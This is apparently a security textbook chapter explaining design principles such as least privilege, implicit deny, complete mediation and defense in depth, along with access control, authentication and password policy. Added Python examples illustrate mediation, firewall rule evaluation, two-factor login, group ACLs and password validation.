Network environments tend to be unique entities because usually no two networks have exactly the same number of computers, the same applications installed, the same number of users, the exact same configurations, or the same available servers. They will not perform the same functions or have the same overall architecture. Since networks have so many variations, there are many different ways in which they can be protected and configured. This chapter covers some foundational approaches to network and host security. Each approach may be implemented in a myriad of ways, but both network and host security need to be addressed for an effective total security program.
Tech Tip
Security Design Principles
The eight design principles from Saltzer and Schroeder are listed and paraphrased here:
Least privilege Use minimum privileges necessary to perform a task.
Separation of privilege Access should be based on more than one item.
Fail-safe defaults Deny by default (implicit deny) and only grant access with explicit permission.
Economy of mechanism Mechanisms should be small and simple.
Complete mediation Protection mechanisms should cover every access to every object.
Open design Protection mechanisms should not depend upon secrecy of the mechanism itself.
Least common mechanism Protection mechanisms should be shared to the least degree possible among users.
Psychological acceptability Protection mechanisms should not impact users, or if they do, the impact should be minimal.
Ref: J. H. Saltzer and M. D. Schroeder, "The Protection of Information in Computer Systems," Proc. IEEE, vol. 63, no. 9, 1975, pp. 1278–1308.
Security Principles
In the mid-1970s, two computer scientists from MIT, Jerome Saltzer and Michael Schroeder, published a paper on design principles for a secure computer system. The Saltzer and Schroeder paper, titled "The Protection of Information in Computer Systems," has been hailed as a seminal work in computer security, and the eight design principles are as relevant today as they were in the 1970s. These principles are useful in secure system design and operation.
Least Privilege
One of the most fundamental principles in security is least privilege. This concept is applicable to many physical environments as well as network and host security. Least privilege means that a subject (which may be a user, application, or process) should have only the necessary rights and privileges to perform its task with no additional permissions. Limiting a subject's privileges limits the amount of harm that can be caused, thus limiting an organization's exposure to damage. Users may have access to the files on their workstations and a select set of files on a file server, but no access to critical data that is held within the database. This rule helps an organization protect its most sensitive resources and helps ensure that whoever is interacting with these resources has a valid reason to do so.
Try This!
Examples of the Least Privilege Principle
The security concept of least privilege is not unique to computer security. It has been practiced by organizations such as financial institutions and governments for centuries. Basically it simply means that individuals are given only the absolute minimum of privileges that are required to accomplish their assigned job. Examine the security policies that your organization has in place and see if you can identify examples of where the principle of least privilege has been used.
The concept of least privilege applies to more network security issues than just providing users with specific rights and permissions. When trust relationships are created, they should not be implemented in such a way that everyone trusts each other simply because it is easier. One domain should trust another for very specific reasons, and the implementers should have a full understanding of what the trust relationship allows between two domains. If one domain trusts another, do all of the users automatically become trusted, and can they thus easily access any and all resources on the other domain? Is this a good idea? Is there a more secure way of providing the same functionality? If a trusted relationship is implemented such that users in one group can access a plotter or printer that is available on only one domain, it might make sense to simply purchase another plotter so that other, more valuable or sensitive resources are not accessible by the entire group.
Another issue that falls under the least privilege concept is the security context in which an application runs. All applications, scripts, and batch files run in the security context of a specific user on an operating system. They execute with specific permissions as if they were a user. The application may be Microsoft Word and run in the space of a regular user, or it may be a diagnostic program that needs access to more sensitive system files and so must run under an administrative user account, or it may be a program that performs backups and so should operate within the security context of a backup operator. The crux of this issue is that a program should execute only in the security context that is needed for that program to perform its duties successfully. In many environments, people do not really understand how to make programs run under different security contexts, or it may just seem easier to have all programs run under the administrator account. If attackers can compromise a program or service running under the administrator account, they have effectively elevated their access level and have much more control over the system and many more ways to cause damage.
Try This!
Control of Resources
Being able to apply the appropriate security control to file and print resources is an important aspect of the least privilege security principle. How this is implemented varies depending on the operating system that the computer runs. Check how the operating system that you use provides for the ability to control file and print resources.
Separation of Privilege
Protection mechanisms can be employed to grant access based on a variety of factors. One of the key principles is to base decisions on more than a single piece of information. The principle of separation of privilege states that the protection mechanism should be constructed so that it uses more than one piece of information to make access decisions. Applying this principle to the people side of the security function results in the concept of separation of duties.
The principle of separation of privilege is applicable to physical environments as well as network and host security. When applied to people's actions, separation of duties specifies that for any given task, more than one individual needs to be involved. The task is broken into different duties, each of which is accomplished by a separate individual. By implementing a task in this manner, no single individual can abuse the system for his or her own gain. This principle has been implemented in the business world, especially financial institutions, for many years. A simple example is a system in which one individual is required to place an order and a separate person is needed to authorize the purchase.
While separation of duties provides a certain level of checks and balances, it is not without its own drawbacks. Chief among these is the cost required to accomplish the task. This cost is manifested in both time and money. More than one individual is required when a single person could accomplish the task, thus potentially increasing the cost of the task. In addition, with more than one individual involved, a certain delay can be expected because the task must proceed through its various steps.
Fail-Safe Defaults
Today, the Internet is no longer the friendly playground of researchers that it once was. This has resulted in different approaches that might at first seem less than friendly but that are required for security purposes. Fail-safe defaults is a concept that when something fails, it should do so to a safe state. One approach is that a protection mechanism should deny access by default, and grant access only when explicit permission exists. This is sometimes called default deny, and the common operational term for this approach is implicit deny.
Frequently in the network world, administrators make many decisions concerning network access. Often a series of rules will be used to determine whether or not to allow access (which is the purpose of a network firewall). If a particular situation is not covered by any of the other rules, the implicit deny approach states that access should not be granted. In other words, if no rule would allow access, then access should not be granted. Implicit deny applies to situations involving both authorization and access.
The alternative to implicit deny is to allow access unless a specific rule forbids it. Another example of these two approaches is in programs that monitor and block access to certain web sites. One approach is to provide a list of specific sites that a user is not allowed to access. Access to any site not on the list would be implicitly allowed. The opposite approach (the implicit deny approach) would block all access to sites that are not specifically identified as authorized. As you can imagine, depending on the specific application, one or the other approach will be more appropriate. Which approach you choose depends on the security objectives and policies of your organization.
Implicit deny is another fundamental principle of security, and students need to be sure that they understand this principle. Similar to least privilege, this principle states that if you haven't specifically been allowed access, then it should be denied.
Economy of Mechanism
The terms security and complexity are often at odds with each other, because the more complex something is, the harder it is to understand, and you cannot truly secure something if you do not understand it. Another reason complexity is a problem within security is that it usually allows too many opportunities for something to go wrong. If an application has 4000 lines of code, there are a lot fewer places for buffer overflows, for example, than in an application of two million lines of code. The principle of economy of mechanism is described as always using simple solutions when available.
Keep it simple: Another method of looking at the principle of economy of mechanism is that the protection mechanism should be small and simple.
An example of the principle concerns the number of services that you allow your system to run. Default installations of computer operating systems often leave many services running. The keep-it-simple principle tells us to eliminate or disable those services that we don't need. This is also a good idea from a security standpoint because it results in fewer applications that can be exploited and fewer services that the administrator is responsible for securing. The general rule of thumb is to eliminate or disable all nonessential services and protocols. This of course leads to the question, how do you determine whether a service or protocol is essential or not? Ideally, you should know what your computer system or network is being used for, and thus you should be able to identify and activate only those elements that are essential. For a variety of reasons, this is not as easy as it sounds. Alternatively, a stringent security approach that one can take is to assume that no service is necessary (which is obviously absurd) and activate services and ports only as they are requested. Whatever approach is taken, there is a never-ending struggle to try to strike a balance between providing functionality and maintaining security.
Complete Mediation
One of the fundamental tenets of a protection system is to check all access requests for permission. Each and every time a subject requests access to an object, the permission must be checked; otherwise an attacker might gain unauthorized access to an object. Complete mediation refers to the concept that each and every request should be verified. When permissions are verified the first time, and the result is cached for subsequent use, performance may be increased, but this also opens the door to permission errors. Should a permission change subsequent to the first use, this change would not be applied to the operations after the initial check.
Complete mediation also refers to ensuring that all operations go through the protection mechanism. When security controls are added after the fact, it is important to make certain that all process flows are covered by the controls, including exceptions and out-of-band requests. If an automated process is checked in one manner, but a manual paper backup process has a separate path, it is important to ensure all checks are still in place. When a system undergoes disaster recovery or business continuity processes, or backup and/or restore processes, these too require complete mediation.
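The following Python program is an added example, not code from the textbook, that shows the permission error the text warns about. Two stores guard the same object: one consults the live policy on every read (complete mediation), the other checks once and caches the answer. After the grant is revoked, only the mediated store stops the access. The policy table, subject, object, and data are constructed for this illustration.

```python
from typing import Dict, Set, Tuple


class Policy:
    """The live authorization table; grants can be revoked at any time."""

    def __init__(self) -> None:
        self._grants: Set[Tuple[str, str, str]] = set()

    def grant(self, subject: str, obj: str, action: str) -> None:
        self._grants.add((subject, obj, action))

    def revoke(self, subject: str, obj: str, action: str) -> None:
        self._grants.discard((subject, obj, action))

    def allows(self, subject: str, obj: str, action: str) -> bool:
        return (subject, obj, action) in self._grants


class MediatedStore:
    """Complete mediation: every read() consults the policy, so a revocation
    takes effect on the very next request."""

    def __init__(self, policy: Policy, objects: Dict[str, str]) -> None:
        self._policy = policy
        self._objects = objects

    def read(self, subject: str, obj: str) -> str:
        if not self._policy.allows(subject, obj, "read"):
            raise PermissionError(f"{subject} may not read {obj}")
        return self._objects[obj]


class CachingStore(MediatedStore):
    """Checks once per (subject, object) and reuses the answer. Faster, but the
    cached decision outlives the permission it was based on."""

    def __init__(self, policy: Policy, objects: Dict[str, str]) -> None:
        super().__init__(policy, objects)
        self._cache: Dict[Tuple[str, str], bool] = {}

    def read(self, subject: str, obj: str) -> str:
        key = (subject, obj)
        if key not in self._cache:
            self._cache[key] = self._policy.allows(subject, obj, "read")
        if not self._cache[key]:
            raise PermissionError(f"{subject} may not read {obj}")
        return self._objects[obj]


def try_read(store: MediatedStore, subject: str, obj: str) -> str:
    """Report the outcome of one access as a string."""
    try:
        store.read(subject, obj)
        return "allowed"
    except PermissionError:
        return "denied"


def revocation_demo(store_cls) -> Tuple[str, str]:
    """Grant, read, revoke, read again; returns the two outcomes."""
    policy = Policy()
    policy.grant("alice", "payroll.csv", "read")          # constructed grant
    store = store_cls(policy, {"payroll.csv": "constructed salary data"})
    before = try_read(store, "alice", "payroll.csv")
    policy.revoke("alice", "payroll.csv", "read")
    after = try_read(store, "alice", "payroll.csv")
    return before, after


if __name__ == "__main__":
    print("mediated:", revocation_demo(MediatedStore))  # ('allowed', 'denied')
    print("caching: ", revocation_demo(CachingStore))   # ('allowed', 'allowed')
```

If a cache is unavoidable for performance, the cached decision has to be invalidated whenever the policy changes, which is itself another path that must go through the protection mechanism.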
Open Design
The principle of open design holds that the protection of an object should not rely upon secrecy of the protection mechanism itself. This principle has been long proven in cryptographic circles, where hiding the algorithm ultimately fails and the true protection relies upon the secrecy and complexity of the keys. The principle does not exclude the idea of using secrecy, but merely states that, on the face of it, secrecy of mechanism is not sufficient for protection.
Another concept in security that should be discussed in this context is the idea of security through obscurity. In this case, security is considered effective if the environment and protection mechanisms are confusing or thought to be not generally known. Security through obscurity uses the approach of protecting something by hiding it. Noncomputer examples of this concept include hiding your briefcase or purse if you leave it in the car so that it is not in plain view, hiding a house key under a doormat or in a planter, or pushing your favorite ice cream to the back of the freezer so that everyone else thinks it is all gone. The idea is that if something is out of sight, it is out of mind. This approach, however, does not provide actual protection of the object. Someone can still steal the purse by breaking into the car, lift the doormat and find the key, or dig through the items in the freezer to find your favorite ice cream. Security through obscurity may make someone work a little harder to accomplish a task, but it does not prevent anyone from eventually succeeding.
Tech Tip
Security Through Obscurity
The principle of open design and the practice of security by obscurity may seem at odds with each other, but in reality they are not. The principle of open design states that secrecy itself cannot be relied upon as a means of protection. The practice of security through obscurity is a proven method of increasing the work factor that an adversary must expend to successfully attack a system. By itself, obscurity is not good protection, but it can complement other controls when both are properly employed.
Similar approaches are seen in computer and network security when attempting to hide certain objects. A network administrator may, for instance, move a service from its default port to a different port so that others will not know how to access it as easily, or a firewall may be configured to hide specific information about the internal network in the hope that potential attackers will not obtain the information for use in an attack on the network.
In most security circles, security through obscurity is considered a poor approach, especially if it is the only approach to security. Security through obscurity simply attempts to hide an object; it doesn't implement a security control to protect it. An organization can use security through obscurity measures to try to hide critical assets, but other security measures should also be employed to provide a higher level of protection. For example, if an administrator moves a service from its default port to a more obscure port, an attacker can still actually find this service; thus a firewall should be used to restrict access to the service. Most people know that even if you do shove your ice cream to the back of the freezer, someone may eventually find it.
Least Common Mechanism
The principle of least common mechanism states that mechanisms used to access resources should be dedicated and not shared. Sharing of mechanisms allows a potential cross-over between channels, resulting in a protection failure mode. For example, if there is a module that enables employees to check their payroll information, a separate module should be employed to change the information, lest a user gain access to change versus read access. Although sharing and reuse are good in one sense, they can represent a security risk in another.
Common examples of the least common mechanism and its isolation principle abound in ordinary systems. Sandboxing is a means of separating the operation of an application from the rest of the operating system. Virtual machines perform the same task between operating systems on a single piece of hardware. Instantiating shared libraries, in which separate instantiation of local classes enables separate but equal coding, is yet another. The key is to provide a means of isolation between processes so information cannot flow between separate users unless specifically designed to do so.
It often amazes security professionals how frequently individuals rely on security through obscurity as their main line of defense. Relying on some piece of information remaining secret is generally not a good idea. This is especially true in this age of reverse-engineering, where individuals analyze the binaries for programs to discover embedded passwords or cryptographic keys. The biggest problem with relying on security through obscurity is that if it fails and the secret becomes known, there often is no easy way to modify the secret to re-secure it.
Psychological Acceptability
Psychological acceptability refers to the users' acceptance of security measures. Users play a key role in the operation of a system, and if security measures are perceived to be an impediment to the work a user is responsible for, then a natural consequence may be that the user bypasses the control. Although a user may understand that this could result in a security problem, the perception that it does result in their performance failure will present pressure to bypass it.
Psychological acceptability is often overlooked by security professionals focused on technical issues and how they see the threat. They are focused on the threat, which is their professional responsibility, so the focus on security is natural and it aligns with their professional responsibilities. This alignment between security and professional work responsibilities does not always translate to other positions in an organization. Security professionals, particularly those designing the security systems, should not only be aware of this concept, but pay particular attention to how security controls will be viewed by workers in the context of their work responsibility, not with respect to security for its own sake.
Defense in Depth
Defense in depth is a principle that is characterized by the use of multiple, different defense mechanisms with a goal of improving the defensive response to an attack. Another term for defense in depth is layered security. Single points of failure represent just that, an opportunity to fail. By using multiple defenses that are different, with differing points of failure, a system becomes stronger. While one defense mechanism may not be 100 percent effective, the application of a second defense mechanism to the items that succeed in bypassing the first mechanism provides a stronger response. There are a couple of different mechanisms that can be employed in a defense-in-depth strategy: layered security and diversity of defense. Together these provide a defense-in-depth strategy that is stronger than any single layer of defense.
A bank does not protect the money that it stores only by using a vault. It has one or more security guards as a first defense to watch for suspicious activities and to secure the facility when the bank is closed. It may have monitoring systems that watch various activities that take place in the bank, whether involving customers or employees. The vault is usually located in the center of the facility, and thus there are layers of rooms or walls before arriving at the vault. There is access control, which ensures that the people entering the vault have to be given authorization beforehand. And the systems, including manual switches, are connected directly to the police station in case a determined bank robber successfully penetrates any one of these layers of protection.
Networks should utilize the same type of layered security architecture. There is no 100 percent secure system, and there is nothing that is foolproof, so a single specific protection mechanism should never be solely relied upon. It is important that every environment have multiple layers of security. These layers may employ a variety of methods, such as routers, firewalls, network segments, IDSs, encryption, authentication software, physical security, and traffic control. The layers need to work together in a coordinated manner so that one does not impede another's functionality and introduce a security hole.
As an example, consider the steps an intruder might have to take to access critical data held within a company's back-end database. The intruder first has to penetrate the firewall and use packets and methods that will not be identified and detected by the IDS (more information on these devices can be found in Chapter 13). The attacker next has to circumvent an internal router performing packet filtering, and then possibly penetrate another firewall used to separate one internal network from another (see Figure 2.3). From there, the intruder must break the access controls that are on the database, which means having to do a dictionary or brute-force attack to be able to authenticate to the database software. Once the intruder has gotten this far, the data still needs to be located within the database. This may in turn be complicated by the use of access control lists outlining who can actually view or modify the data. That is a lot of work.
• Figure 2.3 Layered security
This example illustrates the different layers of security many environments employ. It is important to implement several different layers because if intruders succeed at one layer, you want to be able to stop them at the next. The redundancy of different protection layers assures that there is no one single point of failure pertaining to security. If a network used only a firewall to protect its assets, an attacker able to penetrate this device successfully would find the rest of the network open and vulnerable.
An example of how different security methods can work against each other is seen when firewalls encounter encrypted network traffic. An organization may utilize encryption so that an outside customer communicating with a specific web server is assured that sensitive data being exchanged is protected. If this encrypted data is encapsulated within Secure Sockets Layer (SSL) or Transport Layer Security (TLS) packets and then sent through a firewall, the firewall may not be able to read the payload information in the individual packets.
The layers usually are depicted starting at the top, with more general types of protection, and progressing downward through each layer, with increasing granularity at each layer as you get closer to the actual resource, as you can see in Figure 2.4. This is because the top-layer protection mechanism is responsible for looking at an enormous amount of traffic, and it would be overwhelming and cause too much of a performance degradation if each aspect of the packet were inspected. Instead, each layer usually digs deeper into the packet and looks for specific items. Layers that are closer to the resource have to deal with only a fraction of the traffic that the top-layer security mechanism does, and thus looking deeper and at more granular aspects of the traffic will not cause as much of a performance hit.
• Figure 2.4 Various layers of security
Diversity of Defense
Diversity of defense is a concept that complements the idea of various layers of security. It involves making different layers of security dissimilar so that even if attackers know how to get through a system that comprises one layer, they may not know how to get through a different type of layer that employs a different system for security.
If an environment has two firewalls that form a demilitarized zone (DMZ), for example, one firewall may be placed at the perimeter of the Internet and the DMZ. This firewall analyzes the traffic that is entering through that specific access point and enforces certain types of restrictions. The other firewall may then be placed between the DMZ and the internal network. When applying the diversity-of-defense concept, you should set up these two firewalls to filter for different types of traffic and provide different types of restrictions. The first firewall, for example, may make sure that no FTP, SNMP, or Telnet traffic enters the network but allow SMTP, SSH, HTTP, and SSL traffic through. The second firewall may not allow SSL or SSH through and may interrogate SMTP and HTTP traffic to make sure that certain types of attacks are not part of that traffic.
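The following Python program is an added example, not code from the textbook, that serves two passages: the implicit deny rule evaluation described under Fail-Safe Defaults, and the two dissimilar firewalls just described. A toy packet filter walks an ordered rule list and falls back to a default when no rule matches; with the default set to deny this is implicit deny, and with it set to allow it is the blocklist alternative. The perimeter and internal rule sets mirror the text, and the inspection step is a simple stand-in for the second firewall's interrogation of SMTP and HTTP. The rule sets, the port numbers used for the service names, and the sample packets are all constructed for this illustration.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    proto: str          # "tcp" or "udp"
    dport: int          # destination port
    payload: str = ""   # application data (constructed for the example)


@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    proto: str = "any"
    dport: Optional[int] = None  # None matches every port

    def matches(self, pkt: Packet) -> bool:
        return ((self.proto == "any" or self.proto == pkt.proto)
                and (self.dport is None or self.dport == pkt.dport))


def evaluate(rules: List[Rule], pkt: Packet, default: str = "deny") -> str:
    """First matching rule wins. A packet no rule covers gets the default:
    "deny" is implicit deny (fail-safe default); "allow" is the blocklist
    approach the text contrasts it with."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return default


# Constructed rule sets mirroring the two firewalls in the text. Port numbers
# are the conventional ones for each service.
PERIMETER = [
    Rule("deny", "tcp", 21),    # FTP     explicit denies are redundant under
    Rule("deny", "udp", 161),   # SNMP    implicit deny, but they document intent
    Rule("deny", "tcp", 23),    # Telnet  and still hold if the default changes
    Rule("allow", "tcp", 25),   # SMTP
    Rule("allow", "tcp", 22),   # SSH
    Rule("allow", "tcp", 80),   # HTTP
    Rule("allow", "tcp", 443),  # SSL/TLS
]                               # anything else: implicit deny

INTERNAL = [
    Rule("allow", "tcp", 25),   # SMTP, subject to inspection below
    Rule("allow", "tcp", 80),   # HTTP, subject to inspection below
]                               # SSH and SSL are not listed, so they are denied here


def inspect(pkt: Packet) -> bool:
    """Stand-in for the second firewall's interrogation of SMTP and HTTP:
    traffic on an allowed port must at least look like that protocol."""
    if pkt.dport == 80:
        return pkt.payload.startswith(("GET ", "POST ", "HEAD "))
    if pkt.dport == 25:
        verb = pkt.payload.split(" ", 1)[0].upper()
        return verb in {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "QUIT"}
    return True


def defense_in_depth(pkt: Packet) -> str:
    """Pass the packet through both dissimilar layers; report where it stopped."""
    if evaluate(PERIMETER, pkt) != "allow":
        return "dropped at perimeter firewall"
    if evaluate(INTERNAL, pkt) != "allow":
        return "dropped at internal firewall"
    if not inspect(pkt):
        return "dropped by internal inspection"
    return "delivered"


if __name__ == "__main__":
    # Constructed sample traffic.
    for pkt in (Packet("tcp", 23), Packet("tcp", 443),
                Packet("tcp", 80, "GET / HTTP/1.1"),
                Packet("tcp", 80, "\x16\x03\x01 not http"),
                Packet("tcp", 3389)):
        print(pkt.proto, pkt.dport, "->", defense_in_depth(pkt))
```

Note how a port that neither rule set mentions (3389 in the sample run) is stopped at the perimeter purely by the default, and how a packet the perimeter legitimately allows (SSL on 443) is still refused by the second, differently configured layer.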
Access Control
The term access control has been used to describe a variety of protection schemes. It sometimes refers to all security features used to prevent unauthorized access to a computer system or network. In this sense, it may be confused with authentication. More properly, access control is the ability to control whether a subject (such as an individual or a process running on a computer system) can interact with an object (such as a file or hardware device). Authentication, on the other hand, deals with verifying the identity of a subject. To help understand the difference, consider the example of an individual attempting to log in to a computer system or network. Authentication is the process used to verify to the computer system or network that the individual is who they claim to be. The most common method to do this is through the use of a user ID and password. Once the individual has verified their identity, access controls regulate what the individual can actually do on the system. Just because a person is granted entry to the system does not mean that they should have access to all data the system contains.
Authentication Mechanisms
Access controls define what actions a user can perform or what objects a user can have access to. These controls assume that the identity of the user has been verified. It is the job of authentication mechanisms to ensure that only valid users are admitted. Described another way, authentication is using some mechanism to prove that you are who you claim to be. There are three general factors commonly used in authentication. In order to verify your identity, you can provide
Something you know (knowledge factor)
Something you have (possession factor)
Something about you (something that you are; inherent factor)
The most common authentication mechanism is to provide something that only you, the valid user, should know. The most frequently used example of this is the common user ID (or username) and password. In theory, since you are not supposed to share your password with anybody else, only you should know your password, and thus by providing it, you are proving to the system that you are who you claim to be. Another mechanism for authentication is to provide something that you have in your possession, such as a magnetic stripe card that contains identifying information. The third mechanism is to use something about you for identification purposes, such as your fingerprint or the geometry of your hand. Obviously, for the second and third mechanisms to work, additional hardware devices need to be used (to read the card, fingerprint, or hand geometry).
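The first two factors can be combined so that a login needs both something the user knows and something the user has. The following Python is an added example, not code from the book: it checks a salted password hash (knowledge factor) together with a time-based one-time password of the kind a hardware or phone token generates (possession factor), implemented from RFC 4226 and RFC 6238. The user record and the salt are constructed, and the shared secret is the RFC 6238 reference test key so the codes can be checked against the published vectors.

```python
import hashlib
import hmac
import struct
import time

_SALT = b"constructed-demo-salt"   # constructed; real systems use a random salt per user

# Constructed credential store for one user: a salted password hash (knowledge
# factor) and a TOTP secret shared with the user's token (possession factor).
# The TOTP secret is the RFC 6238 reference test key.
_USERS = {
    "alice": {
        "pw_hash": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 100_000),
        "totp_secret": b"12345678901234567890",
    }
}


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for a given counter value."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at_time: int, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): HOTP with counter = time // step."""
    return hotp(secret, at_time // step, digits)


def verify_password(user: str, password: str) -> bool:
    """Knowledge factor: recompute the hash and compare in constant time."""
    rec = _USERS.get(user)
    if rec is None:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, 100_000)
    return hmac.compare_digest(candidate, rec["pw_hash"])


def verify_totp(user: str, code: str, at_time: int, window: int = 1) -> bool:
    """Possession factor: accept the current step and `window` steps either side."""
    rec = _USERS.get(user)
    if rec is None:
        return False
    for drift in range(-window, window + 1):
        expected = totp(rec["totp_secret"], at_time + drift * 30)
        if hmac.compare_digest(expected, code):
            return True
    return False


def authenticate(user: str, password: str, code: str, at_time=None) -> bool:
    """Two-factor login: both factors must verify; neither result short-circuits the other."""
    if at_time is None:
        at_time = int(time.time())
    pw_ok = verify_password(user, password)
    otp_ok = verify_totp(user, code, at_time)
    return pw_ok and otp_ok
```

Both factors are evaluated before the result is combined, so a failed attempt does not reveal which factor was wrong, and both comparisons are constant-time. The window of one 30-second step on either side absorbs clock drift between the token and the server; widening it trades a little security for convenience, which is exactly the kind of decision a policy has to record.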
Access Control vs. Authentication
It may seem that access control and authentication are two ways to describe the same protection mechanism. This, however, is not the case. Authentication provides a way to verify to the computer who the user is. Once the user has been authenticated, the access controls decide what operations the user can perform. The two go hand-in-hand but they are not the same thing.
Authentication and Access Control Policies
Policies are statements of what the organization wants to accomplish. The organization needs to identify goals and intentions for many different aspects of security. Each aspect will have associated policies and procedures.
Group Policy
Operating systems such as Windows and Linux allow administrators to organize users into groups, to create categories of users for which similar access policies can be established. Using groups saves the administrator time, as adding a new user will not require the administrator to create a completely new user profile; instead, the administrator can determine to which group the new user belongs and then add the user to that group. A group policy defines for the group things such as the applicable operating system and application settings and permissions. Examples of groups commonly found include administrator, user, and guest. Take care when creating groups and assigning users to them so that you do not provide more access than is absolutely required for members of that group. It would be simple to make everybody an administrator—it would cut down on the number of requests users make of beleaguered administrators—but this is not a wise choice, as it also enables users to modify the system in ways that could impact security. Establishing the right levels of access for the various groups up front will save you time and eliminate potential problems that might be encountered later on. More on this subject will be covered in Chapter 14.
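Group-based access control as the preceding sections describe it, applied after authentication has already succeeded: the subject's group memberships are resolved, the object's ACL is consulted, and anything not explicitly granted is denied. The following Python is an added example rather than the book's or any operating system's code; the directory, the ACLs, the file paths, and the audit record format are all constructed.

```python
from datetime import datetime, timezone

# Constructed directory: which groups each user belongs to. A user may be in several.
GROUP_MEMBERS = {
    "administrators": {"alice"},
    "users": {"alice", "bob"},
    "guests": {"carol"},
}

# Constructed ACLs: object -> {group: operations that group may perform}.
# Any operation not listed for one of the subject's groups is denied (implicit deny).
ACLS = {
    "/srv/finance/payroll.xlsx": {"administrators": {"read", "write"}},
    "/srv/public/handbook.pdf": {
        "administrators": {"read", "write"},
        "users": {"read"},
        "guests": {"read"},
    },
    "/srv/shared/notes.txt": {
        "administrators": {"read", "write"},
        "users": {"read", "write"},
    },
}

AUDIT_LOG = []  # append-only record of every decision, kept for later review


def groups_of(user: str) -> set:
    """Resolve the subject's group memberships from the directory."""
    return {g for g, members in GROUP_MEMBERS.items() if user in members}


def effective_permissions(user: str, obj: str) -> set:
    """Union of the operations granted to any group the user belongs to."""
    acl = ACLS.get(obj, {})
    perms = set()
    for group in groups_of(user):
        perms |= acl.get(group, set())
    return perms


def check_access(user: str, obj: str, op: str) -> bool:
    """Access control decision for an already-authenticated subject.

    Authentication (proving who `user` is) is assumed to have happened before this
    is called; this function only answers "may this subject perform `op` on `obj`?".
    """
    allowed = op in effective_permissions(user, obj)
    AUDIT_LOG.append({
        "time": datetime.now(timezone.utc).isoformat(),
        "subject": user, "object": obj, "operation": op,
        "decision": "allow" if allowed else "deny",
    })
    return allowed


def add_user(user: str, group: str) -> set:
    """Onboarding: place the new user in an existing group instead of building a profile."""
    if group not in GROUP_MEMBERS:
        raise KeyError(f"unknown group {group!r}")
    GROUP_MEMBERS[group].add(user)
    return groups_of(user)
```

Because the default answer is "deny", an object that has no ACL entry and a user who belongs to no group both get nothing; the only way to widen what a new user can do is to put that user in a group, which is where the care the text asks for is exercised.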
Tech Tip
Group Policy
The term group policy has different meanings in Linux and Windows systems. In Linux, group policies typically refer to group-level permissions associated with file systems. In Windows, group policies refer to Active Directory objects used to enforce configuration and permissions across a domain.
Password Policy
Since passwords are the most common authentication mechanism, it is imperative that organizations have a policy that addresses them. The password policy should address the procedures used for selecting user passwords (specifying what is considered an acceptably complex password in the organization in terms of the character set and length), the frequency with which passwords must be changed, and how passwords will be distributed. Procedures for creating new passwords should an employee forget her old password also need to be addressed, as well as the acceptable handling of passwords (for example, they should not be shared with anybody else, they should not be written down, and so on). It might also be useful to have the policy address the issue of password cracking by administrators, to enable them to discover weak passwords selected by employees.
A password policy is one of the most basic policies that an organization can have. Make sure you understand the basics of what constitutes a good password along with the other issues that surround password creation, expiration, sharing, and use.
Note that the developer of the password policy and associated procedures can go overboard and create an environment that negatively impacts employee productivity and leads to poorer security, not better. If, for example, the frequency with which passwords are changed is too great, users might write them down or forget them. Neither of these is a desirable outcome, as the former makes it possible for an intruder to find a password and gain access to the system, and the latter leads to too many people losing productivity as they wait for a new password to be created to allow them access again. More information on password policies can be found in Chapter 22.
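A password policy has to be enforced somewhere, and the elements the text lists (character set and length, change frequency, no reuse) can be expressed directly as checks. The following Python is an added example, not from the book; the POLICY values are constructed and an organization would set its own, and the password history is stored as salted PBKDF2 hashes so reuse can be detected without ever keeping old passwords.

```python
import hashlib
import hmac
import os
import string
from datetime import date, timedelta

# Constructed policy parameters; an organization sets its own values.
POLICY = {
    "min_length": 12,      # minimum password length
    "min_classes": 3,      # of: lowercase, uppercase, digits, punctuation
    "max_age_days": 90,    # how often passwords must be changed
    "history": 5,          # how many previous passwords may not be reused
}
CHARACTER_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
                     string.digits, string.punctuation)


def hash_password(password: str, salt: bytes = None) -> tuple:
    """Salted PBKDF2-HMAC-SHA256; only this (salt, digest) pair is ever stored."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    return salt, digest


def complexity_violations(password: str) -> list:
    """Return the policy rules the candidate breaks (empty list if none)."""
    problems = []
    if len(password) < POLICY["min_length"]:
        problems.append(f"shorter than {POLICY['min_length']} characters")
    classes = sum(1 for cls in CHARACTER_CLASSES if any(c in cls for c in password))
    if classes < POLICY["min_classes"]:
        problems.append(f"uses {classes} character classes, policy requires {POLICY['min_classes']}")
    if password.strip() != password:
        problems.append("leading or trailing whitespace")
    return problems


def is_reused(password: str, history: list) -> bool:
    """True if the candidate matches any of the most recent stored (salt, digest) pairs."""
    recent = history[-POLICY["history"]:]
    return any(hmac.compare_digest(hash_password(password, salt)[1], digest)
               for salt, digest in recent)


def is_expired(last_changed: date, today: date) -> bool:
    """Change-frequency rule: has the password been in use longer than allowed?"""
    return today - last_changed > timedelta(days=POLICY["max_age_days"])


def validate_new_password(password: str, history: list) -> list:
    """Every reason a password change would be rejected; an empty list means accepted."""
    problems = complexity_violations(password)
    if is_reused(password, history):
        problems.append(f"matches one of the last {POLICY['history']} passwords")
    return problems
```

Returning the full list of violations, rather than stopping at the first, lets the user fix a rejected choice in one attempt, which is part of keeping the policy from becoming the productivity drain the text warns about. The same history mechanism is what an administrator's periodic weak-password audit would run against, since it never needs the plaintext.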
Security Models
